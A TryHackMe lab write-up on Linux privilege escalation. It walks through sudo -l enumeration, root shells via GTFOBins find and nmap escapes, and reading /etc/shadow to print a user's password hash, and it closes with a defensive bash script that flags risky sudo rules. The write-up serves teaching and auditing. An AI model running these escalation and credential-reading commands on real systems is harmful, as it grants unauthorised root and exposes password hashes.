TryHackMe: Linux Privilege Escalation
--
Task 6
How many programs can the user “karen” run on the target system with sudo rights?
As mentioned in the task writeup, we can use the following command to list the commands our user is allowed to run with sudo:
sudo -l
ANSWER: 3
What is the content of the flag2.txt file?
We know we can run find as sudo, so this means we can theoretically search the whole file system for this file.
So we’ll use the find command for this:
sudo find / -type f -name 'flag2.txt'
Success — it’s in /home/ubuntu.
Next we can use the cat command to read it:
cat /home/ubuntu/flag2.txt
Answer: THM-402028394
You’ll note that if you run the above find command without sudo it fails to find the file.
So we needed sudo to be able to use find.
We could also have found the file manually; it would just have taken a while.
How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?
Again we go back to the previously linked website and find Nmap:
https://gtfobins.github.io/gtfobins/nmap/
If we scroll down we’ll see a section called Sudo.
Well we just got root, so we know it can run as sudo and the command is right there:
Answer: sudo nmap --interactive
What is the hash of frank’s password?
Remember those three commands from earlier, when we ran sudo -l?
If we look at this website (which is also mentioned earlier in the task writeup):
https://gtfobins.github.io/gtfobins/
We can see that there’s a page for find.
https://gtfobins.github.io/gtfobins/find/
There’s a command in here we can use to get root:
sudo find . -exec /bin/sh \; -quit
This gives us a root shell with access to everything, not just sudo rights for the karen account.
From earlier exercises we know that the password hashes are stored here:
/etc/shadow
As we have root now, we can easily look at those using cat:
cat /etc/shadow
This will give us a list of the hashes, where we can see frank's:
frank:$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1:18796:0:99999:7:::
We then just need to clean it up for the THM website by keeping only the hash, which is the second colon-separated field:
Answer: $6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1
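From the defender's side, the sudo -l listing and the GTFOBins find entry above point to the same check: no sudo rule should allow a binary that can spawn a shell. The script below is an added example, not part of the original writeup; it reads sudo -l output and flags such rules. The binary list beyond find and nmap is an assumed, partial selection, and the sample output is constructed.

```bash
#!/usr/bin/env bash
# Binaries that GTFOBins lists with a "Sudo" section. find and nmap are the
# ones this page uses; vim, less and awk are added as an assumed, partial list.
SHELL_ESCAPE_BINS="find nmap vim less awk"

# Reads `sudo -l` output on stdin and prints "RISK <runas> <command>" for every
# permitted command that is unrestricted (ALL) or whose binary is in the list.
audit_sudo_list() {
  awk -v bins="$SHELL_ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    # Rule lines are indented and start with the run-as spec, e.g.
    #   (root) NOPASSWD: /usr/bin/nmap, /usr/bin/uptime
    /^[ \t]+\(/ {
      line = $0
      sub(/^[ \t]+/, "", line)
      close_at = index(line, ")")
      runas = substr(line, 1, close_at)
      rest = substr(line, close_at + 1)
      # Strip tags such as NOPASSWD: or SETENV: in front of the command list.
      while (match(rest, /^[ \t]*[A-Z_]+:/)) rest = substr(rest, RLENGTH + 1)
      m = split(rest, cmds, ",")
      for (j = 1; j <= m; j++) {
        cmd = cmds[j]
        gsub(/^[ \t]+|[ \t]+$/, "", cmd)
        split(cmd, words, " ")          # words[1] is the binary path
        k = split(words[1], parts, "/") # parts[k] is its basename
        if (cmd == "ALL" || (parts[k] in risky)) print "RISK", runas, cmd
      }
    }'
}

# Constructed sample of `sudo -l` output (host name and rules are made up).
sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for karen on target:
    env_reset, mail_badpass

User karen may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nmap, /usr/bin/uptime
EOF
}

sample_sudo_l | audit_sudo_list
# On a real host: sudo -l | audit_sudo_list
```

A flagged rule is equivalent to granting that user root, so review it as such when auditing sudoers.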